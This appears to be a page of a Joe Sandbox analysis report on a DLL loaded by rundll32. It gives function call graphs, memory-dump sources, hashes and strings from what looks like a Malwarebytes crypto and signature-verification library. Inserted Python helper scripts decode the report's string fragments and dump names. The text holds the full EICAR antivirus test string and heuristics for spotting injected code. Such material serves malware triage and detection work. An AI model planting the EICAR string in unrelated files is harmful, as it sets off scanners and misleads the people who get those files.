15498->15499 15500 18004c19f 15499->15500 15501 1800322c0 29 API calls 15499->15501 15500->15404 15502 18004c17b 15501->15502 15502->15500 15503 1800322c0 29 API calls 15502->15503 15504 18004c18d 15503->15504 15504->15500 15505 1800322c0 29 API calls 15504->15505 15505->15500 15507 180032f6a 15506->15507 15509 180032f8b 15507->15509 15510 180032ff5 15507->15510 15511 180032ff9 ctype 15507->15511 15508 180036db0 29 API calls 15508->15510 15509->15508 15510->15444 15511->15510 15512 18003c550 13 API calls 15511->15512 15512->15510 15514 18003d6c5 15513->15514 15515 18003d6e5 15514->15515 15518 18003d715 15514->15518 15516 180036db0 29 API calls 15515->15516 15517 18003d703 15516->15517 15517->15462 15519 18003d744 15518->15519 15520 180036db0 29 API calls 15518->15520 15519->15462 15520->15519 19496 180002b60 TlsAlloc 19497 180002b78 19496->19497 19498 180002b8b 19496->19498 19499 180106ae4 57 API calls 19497->19499 19501 180023340 std::bad_exception::bad_exception 62 API calls 19498->19501 19500 180106b29 
19499->19500 19502 180002baf 19501->19502 19503 180108fa8 Concurrency::cancel_current_task 2 API calls 19502->19503 19504 180002bc0 19503->19504 19505 180022fa0 shared_ptr InitializeCriticalSectionAndSpinCount 19504->19505 19505->19497 14579 18012eb94 14585 18012eba5 _Getctype 14579->14585 14580 18012ebf6 14589 180124bfc 14580->14589 14581 18012ebda RtlAllocateHeap 14583 18012ebf4 14581->14583 14581->14585 14585->14580 14585->14581 14586 1801293dc 14585->14586 14592 18012941c 14586->14592 14598 18012ac28 GetLastError 14589->14598 14591 180124c05 14591->14583 14597 18012884c EnterCriticalSection 14592->14597 14599 18012ac4c 14598->14599 14600 18012ac69 FlsSetValue 14598->14600 14599->14600 14613 18012ac59 SetLastError 14599->14613 14601 18012ac7b 14600->14601 14600->14613 14615 18012eb94 14601->14615 14605 18012aca8 FlsSetValue 14607 18012acb4 FlsSetValue 14605->14607 14608 18012acc6 14605->14608 14606 18012ac98 FlsSetValue 14609 18012aca1 14606->14609 14607->14609 14628 18012a81c 14608->14628 14622 18012c690 14609->14622 14613->14591 14621 18012eba5 _Getctype 14615->14621 14616 18012ebf6 14618 180124bfc _Wcrtomb 10 API calls 14616->14618 14617 18012ebda RtlAllocateHeap 14619 18012ac8a 14617->14619 14617->14621 14618->14619 14619->14605 14619->14606 14620 1801293dc std::_Facet_Register 2 API calls 14620->14621 14621->14616 14621->14617 14621->14620 14623 18012c695 HeapFree 14622->14623 14624 18012c6c6 14622->14624 14623->14624 14625 18012c6b0 GetLastError 14623->14625 14624->14613 14626 18012c6bd __free_lconv_mon 14625->14626 14627 180124bfc _Wcrtomb 9 API calls 14626->14627 14627->14624 14633 18012a6f4 14628->14633 14645 18012884c EnterCriticalSection 14633->14645

Control-flow Graph
Function 180001d60 (basic blocks 180001d60 through 1800026b4, with a tail into 180106b20-180106b36). The graph is rendered interactively in the original report; the flattened edge list is not reproduced here. Internal calls on the graph: 180008370, 18013eb70, 180106664, 180008d20, 18001f920, 18001fba0, 180106e94, 180106630, 1801160ac, 18001f070, 18001fe80, 180106ae4.
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
• String ID: )7CC$)7}$$-TES$4(P^$ANDA$EICA$H+H*$IRUS$L$LE!$$MSCF$NTIV$P%@A$PZX5$P[4\$R-ST$RD-A$Rar!$Rar!Rar!$T-FI$X5O!
• Note: the 4-character entries are consecutive dword-sized pieces of the EICAR test string X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*; MSCF is the Microsoft Cabinet header magic and Rar! the RAR archive header magic. This is consistent with a routine that checks input against these signatures four bytes at a time.
      • API String ID: 3936042273-42239843
      • Opcode ID: 1a2d1d1cae48639a1bf825e4c12e92b31543beafbb8b1ed0150fcf9411e74a73
      • Instruction ID: f65e32fc1529cad7a00d9ef93ac9e0bce8ed8251db96144b5fa9cecdc263a2d9
      • Opcode Fuzzy Hash: 1a2d1d1cae48639a1bf825e4c12e92b31543beafbb8b1ed0150fcf9411e74a73
      • Instruction Fuzzy Hash: 41424973A11BC489EB61CF75E8843DD33A5F7887A8F208715EA981AB99DF74C284C740
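The String ID entries above are hard to read as a flat list. The following script is an added example, not part of the Joe Sandbox report, that re-assembles the fragments copied from that field and checks whether they tile a known signature. The reading of the fragments as dword immediates from a four-bytes-at-a-time compare is an inference from their width, not something the report states; the EICAR string and the CAB/RAR header magics are public constants. Two fragments, L and Rar!Rar!, are left unexplained by the script.

```python
# Added example, not part of the Joe Sandbox report.  Re-assemble the
# 4-character string fragments the report lists under "String ID" for the
# function at 180001d60 and check whether they tile a known signature.
# Interpretation (an inference, not a report finding): code that compares a
# buffer against a constant four bytes at a time embeds the constant as dword
# immediates, and a string extractor then shows it as unordered 4-char chunks.

# Fragments copied from the report's String ID field.  They are listed
# explicitly because the report joins entries with '$' and the EICAR string
# itself contains '$', so splitting the raw field on '$' would be ambiguous.
REPORT_FRAGMENTS = [
    ")7CC", ")7}$", "-TES", "4(P^", "ANDA", "EICA", "H+H*", "IRUS", "L", "LE!$",
    "MSCF", "NTIV", "P%@A", "PZX5", "P[4\\", "R-ST", "RD-A", "Rar!", "Rar!Rar!",
    "T-FI", "X5O!",
]

# Public test-string and file-header constants (not taken from the report).
SIGNATURES = {
    "EICAR": r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*",
}
KNOWN_MAGIC = {
    "MSCF": "Microsoft Cabinet (CAB) header",
    "Rar!": "RAR archive header",
}


def dword_chunks(text, width=4):
    """Split text into consecutive width-sized pieces (the last may be short)."""
    return [text[i:i + width] for i in range(0, len(text), width)]


def match_fragments(fragments, signatures=SIGNATURES, magic=KNOWN_MAGIC):
    """Explain a set of string fragments against known signatures and magics.

    Returns, per signature, whether every dword chunk of it is present and which
    chunks are missing; the fragments that are known file-header magics; and
    whatever fragments are left over.
    """
    have = set(fragments)
    explained = set()
    per_sig = {}
    for name, sig in signatures.items():
        needed = dword_chunks(sig)
        missing = [c for c in needed if c not in have]
        per_sig[name] = {"complete": not missing, "missing": missing, "chunks": len(needed)}
        explained.update(c for c in needed if c in have)
    found_magic = {f: magic[f] for f in sorted(have) if f in magic}
    explained.update(found_magic)
    return {
        "signatures": per_sig,
        "magic": found_magic,
        "unexplained": sorted(have - explained),
    }


if __name__ == "__main__":
    result = match_fragments(REPORT_FRAGMENTS)
    for name, info in result["signatures"].items():
        state = "complete" if info["complete"] else f"missing {info['missing']}"
        print(f"{name}: {info['chunks']} dword chunks, {state}")
    for frag, desc in result["magic"].items():
        print(f"{frag!r}: {desc}")
    print("unexplained:", result["unexplained"])
```

The script keeps the full EICAR string in source, which some endpoint products flag regardless of file size; keep it out of shared drives or split the constant if that is a problem in your environment.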

Control-flow Graph
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: MemoryVirtual$AllocateProtect
      • String ID: %$+$+$4$D$H$M$U$e$g$i$k$v$y$y$z
      • API String ID: 2931642484-2653694703
      • Opcode ID: 29ae91233c9e2a0f6e91985882b77d90a3ef669daaed8ef0da2c19573c3da0e6
      • Instruction ID: 65144e74e28f08dbd9014b17249a5266b53b2c5cc9101eb6481addb504c11909
      • Opcode Fuzzy Hash: 29ae91233c9e2a0f6e91985882b77d90a3ef669daaed8ef0da2c19573c3da0e6
      • Instruction Fuzzy Hash: C351D37220DBC486E7529764B40478AAB91E3897E8F544225F7D90BBC9DFBDC10DCB14
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ErrorFreeHeapLast
      • String ID:
      • API String ID: 485612231-0
      • Opcode ID: e1f295aa13e5ef76a22ddaed4986782ce05a382e3253e5ee7e8977a23b813279
      • Instruction ID: 944969eb6665ad90594a193c0f285eaebd773b5436d63678d6c4f0510345ffff
      • Opcode Fuzzy Hash: e1f295aa13e5ef76a22ddaed4986782ce05a382e3253e5ee7e8977a23b813279
      • Instruction Fuzzy Hash: 64419272310A5886EF85CF2AD91839973A2B74CFE0F49D026EE0D87B54EE7CC5498304
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
      • Instruction ID: 93dc450cf14adf797917e7a542985136759fb69b637e32f4155183e02411b3fe
      • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
      • Instruction Fuzzy Hash: 86F0D1B0628B408BE3449F2884C9275B7E1FBD8645F20052EE889C7361CB3198428A43
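The dump file names under Memory Dump Source encode where each function was lifted from, and the record above is the first on this page taken from a region that is not backed by a PE image. The following script is an added example, not part of the Joe Sandbox report, that decodes those names. The field positions (process index, run, dump id, base address, page protection, region type) are an assumption inferred from the names on this page; the protection and region-type values themselves are the standard Win32 MEMORY_BASIC_INFORMATION constants, and the decode agrees with the Offset and "based on PE" values the report prints beside each name.

```python
# Added example, not part of the Joe Sandbox report.  Decode the memory-dump
# file names listed under "Memory Dump Source" so the kind of region a function
# was lifted from is visible at a glance.
#
# ASSUMPTION: field positions are inferred from the names on this page:
#   process index . run . dump id . base address . page protection .
#   <not decoded> . region type . <not decoded>
# The protection and region-type values are standard Win32 constants.
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_BITS = {0x10, 0x20, 0x40, 0x80}
WRITE_BITS = {0x04, 0x08, 0x40, 0x80}

MEM_TYPE = {
    0x00020000: "MEM_PRIVATE",
    0x00040000: "MEM_MAPPED",
    0x01000000: "MEM_IMAGE",
}


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process_index: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self):
        # Mask off PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifiers.
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self):
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def writable_executable_private(self):
        """Writable and executable memory not backed by a PE image: the region
        type in which unpacked or injected code is normally found."""
        p = self.protect & 0xFF
        return p in EXEC_BITS and p in WRITE_BITS and self.mem_type != 0x01000000


def parse_dump_name(name):
    """Parse one .sdmp file name into a DumpRegion (fields are hexadecimal)."""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name!r}")
    return DumpRegion(
        name=name,
        process_index=int(fields[0], 16),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
    )


def triage(names):
    """Return one (base, protection, type, flagged) tuple per dump name."""
    rows = []
    for n in names:
        r = parse_dump_name(n)
        rows.append((hex(r.base), r.protect_name, r.type_name, r.writable_executable_private))
    return rows


# Dump names copied from this report page.
REPORT_DUMPS = [
    "00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp",
    "00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp",
    "00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for base, prot, typ, flagged in triage(REPORT_DUMPS):
        print(f"{base:>16}  {prot:<24} {typ:<12} {'<-- review' if flagged else ''}")
```

The third name decodes to a PAGE_EXECUTE_READWRITE, MEM_PRIVATE region at 2357C700000, matching the report's "based on PE: false" for that dump; functions attributed to it (the records with Snapshot File hcaresult_6_3_2357c700000_rundll32.jbxd) are the ones to read first when following the thread-injection signatures listed at the top of the report.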
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
      • Instruction ID: 4c677bd9e44e8efc9e5a4b01f3a003a6f663c634b3678f0d9f0e16988c6a2b33
      • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
      • Instruction Fuzzy Hash: 7BF05470A24F444BD704AF2C884E67577D1F7E8645F54462EE848C7361DF35E5428B43

Control-flow Graph
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Allocstd::bad_exception::bad_exception
      • String ID: cannot allocate thread context key
      • API String ID: 287486779-1710566765
      • Opcode ID: 70f5ec321c4b3483aab5bc5a2522a323dc813696c1eb10960a0e64ce664ba700
      • Instruction ID: 3eb9b5f93a8efaf96118b30193394a4e6d026d19488291b2ffbd53e73d27dd25
      • Opcode Fuzzy Hash: 70f5ec321c4b3483aab5bc5a2522a323dc813696c1eb10960a0e64ce664ba700
      • Instruction Fuzzy Hash: 6A014F7172090DD1E692FB34E89A3D87365BB9D368FD08112D14D825F6DE28C75EC700

Control-flow Graph
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Startupstd::bad_exception::bad_exception
      • String ID: Failed to initialize network subsystem
      • API String ID: 36264510-1820565237
      • Opcode ID: 352e269cbea8bc61e3b80d515c178517ace928a2895d31e5eb89a4d4d5db4166
      • Instruction ID: 2ad56a504399f77fca66a98e9298a4838375de0c8b08391d47cfbd9bbf6bfd2d
      • Opcode Fuzzy Hash: 352e269cbea8bc61e3b80d515c178517ace928a2895d31e5eb89a4d4d5db4166
      • Instruction Fuzzy Hash: B1F03772214D4DD1EBA1EB14E8893E96363F799354FC09025A28D478BBEE6CC70DCB00
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction ID: 5a8696f8cb31675befd9a6e4a6c6ad19b1061a4bb057142c23aa6df9f1f141d1
      • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction Fuzzy Hash: 66B17171218A488FEB54EF1CC885BAAB7E1FB98310F50466DE48EC7251DB34E945CB82
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction ID: 3ad2c28ad2edaddaace38580ba8383bd6f9fdd329f53f8b60d54cc3cc6004116
      • Opcode Fuzzy Hash: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction Fuzzy Hash: 3C012D30619D7A0BF7D9A76968C5BE1B6C5F794310F644159DC0EC7286DD29CE414380

Control-flow Graph
Function 18013400c (basic blocks 18013400c through 180134084). The graph is rendered interactively in the original report; the flattened edge list is not reproduced here. Calls on the graph: 18012c6cc, 18012c690, 180124bfc, 180139d1c, 1801293dc and RtlReAllocateHeap.
      APIs
        • Part of subcall function 000000018012C6CC: HeapAlloc.KERNEL32(?,?,00000000,0000000180126ECB), ref: 000000018012C70A
      • RtlReAllocateHeap.NTDLL(?,?,00000000,000000018012A65B,?,?,?,000000018012A0B7,?,?,?,0000000180129FAD,?,?,?,000000018012A38E), ref: 0000000180134079
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Heap$AllocAllocate
      • String ID:
      • API String ID: 2177240990-0
      • Opcode ID: cbf9e1bcc966571a6f1044025fffae21e333bb6e3deebf2d98a299e414a4521b
      • Instruction ID: f695400d6f30680e5f9617c48cc471e8a6d1151c8eb51c0e9e368cd19eb7ef02
      • Opcode Fuzzy Hash: cbf9e1bcc966571a6f1044025fffae21e333bb6e3deebf2d98a299e414a4521b
      • Instruction Fuzzy Hash: 7E016D7230060942FEDAAB6165893EA13915B8C7F0F1AD221BB25462D6DE2CD6084700

Control-flow Graph
Function 18012eb94 (basic blocks 18012eb94 through 18012ec08). The graph is rendered interactively in the original report; the flattened edge list is not reproduced here. Calls on the graph: 180139d1c, 1801293dc, 180124bfc and RtlAllocateHeap.
      APIs
      • RtlAllocateHeap.NTDLL(?,?,00000000,000000018012AC8A,?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012EBE9
      Memory Dump Source
• Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: the same ten 180000000-image dump files listed for the first function above
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: 1bbd031e9b40aaa3df7e7cfd2382faa7c78f8fa622478c522076619262ec1d53
      • Instruction ID: 2f222e57a63ab880ed9cbf42d716b4e0d6c647b669ae0dc4a7462a43906732ee
      • Opcode Fuzzy Hash: 1bbd031e9b40aaa3df7e7cfd2382faa7c78f8fa622478c522076619262ec1d53
      • Instruction Fuzzy Hash: 16F01DB530260946FEE7D6A999593D513D55B4EBA0F0CD4309D0F863D6EE5DC6884310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Handle$CloseErrorLast$Module$AddressCreateProcSnapshotToolhelp32$FirstLibraryLoadModule32OpenProcessQuerySleepVirtual
      • String ID: Crypto$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\Crypto.cpp$Failed to load psapi.dll = %u$GetModuleInformation$GetModuleInformation = %p$ImageNotify: Image has unusual memory protection!! %u - %s$ImageNotify: Image has unusual memory protection!! (%zu) (%u) PID = %u - %s$K32GetModuleInformation$K32GetModuleInformation = %p$VerifyImage Failed to open the process %u- %u$VerifyImage failed to get base address from module handle %u (GetModInfo = %p)$VerifyImage failed to get module handle - %u$VerifyImage failed to get module information - %u$VerifyImage got base address from module handle %p$kernel32.dll$mb::common::crypto::VerifyImage$psapi.dll
      • API String ID: 1552750388-2544890722
      • Opcode ID: cbc42031f762b81ed146b49916ee564eac4c9e52cfbada4c05aeaa6be7a08a72
      • Instruction ID: 788443a6203ae7b63ad1ef169ede3e5baaab21628117a0fbacbdca54153a5daf
      • Opcode Fuzzy Hash: cbc42031f762b81ed146b49916ee564eac4c9e52cfbada4c05aeaa6be7a08a72
      • Instruction Fuzzy Hash: B4E12876204B4882E7A2CF11F8887D977A5F78CBA5F448116EA8E477A5DF38C60DCB04
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmProvider$CloseDestroyOpen
      • String ID: $**** Error 0x%x returned by BCryptOpenAlgorithmProvider$****> Failed to import public key - %x$0$@$ConnectW$ConnectWise certificate is trusted!$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$Failed to import the public key - %x$ImportRsaPublicKeyX$Kaseya Limited$Kaseya certificate is trusted!$MD5$Malwareb$MbCommonSigCRYPTUSR$RSA$RSAPUBLICBLOB$SHA1$SHA256$SHA384$SHA512$VerifyTrusted$ise, Inc$ytes
      • API String ID: 2054559242-2717880233
      • Opcode ID: cc0a3cb7e0da9c7ff66ae0a5c9362b601b2ca27709e9a57ede8521292f8f2120
      • Instruction ID: 91263c3910ef83fdbdd24a69e8ba3a9f61853925db0fc0cbaca4464654ca9d14
      • Opcode Fuzzy Hash: cc0a3cb7e0da9c7ff66ae0a5c9362b601b2ca27709e9a57ede8521292f8f2120
      • Instruction Fuzzy Hash: 3DA16B76604F88C5EBA68B05E4483E977A5F78CBD5F858016EA894B7A4DF38CA4DC700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmPropertyProvider$CloseConcurrency::cancel_current_taskDestroyHashOpen_invalid_parameter_noinfo_noreturn
      • String ID: **** Error 0x%x returned by BCryptCreateHash$**** Error 0x%x returned by BCryptFinishHash$**** Error 0x%x returned by BCryptGetProperty getting hash length$**** Error 0x%x returned by BCryptGetProperty getting object length$**** Error 0x%x returned by BCryptHashData$**** Error 0x%x returned by BCryptOpenAlgorithmProvider - Hash$**** Invalid hash buffer: %p$**** Invalid hash size: %u, need %u$**** memory allocation failed$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$HashDigestLength$MD5$MbCommonSigCRYPTUSR$MbHashMemory$ObjectLength$SHA1$SHA256$SHA384$SHA512
      • API String ID: 860087726-4021669043
      • Opcode ID: 5c1f8620c86830096c7b504056d06b58c2052937ddca11c143a02181f65b63d5
      • Instruction ID: 9e2ce5262259e5bcabe6f94ea6a9927640127448378a215be27b5a32b5f0547c
      • Opcode Fuzzy Hash: 5c1f8620c86830096c7b504056d06b58c2052937ddca11c143a02181f65b63d5
      • Instruction Fuzzy Hash: 30D16F72204B48C5EBA2CB55F4847EDB7A1F78C7E5F808116EA894BBA5DF78C649C700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmDestroyProvider$CloseImportOpenPairSignatureVerify
      • String ID: **** Error 0x%x returned by BCryptOpenAlgorithmProvider$**** Failed to import public key - %x$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$Failed to import the public key - %x$ImportRsaPublicKeyX$MD5$MbCommonSigCRYPTUSR$RSA$RSAPUBLICBLOB$SHA1$SHA256$SHA384$SHA512$Verify signature returns %x$VerifyData
      • API String ID: 2019841491-4080738847
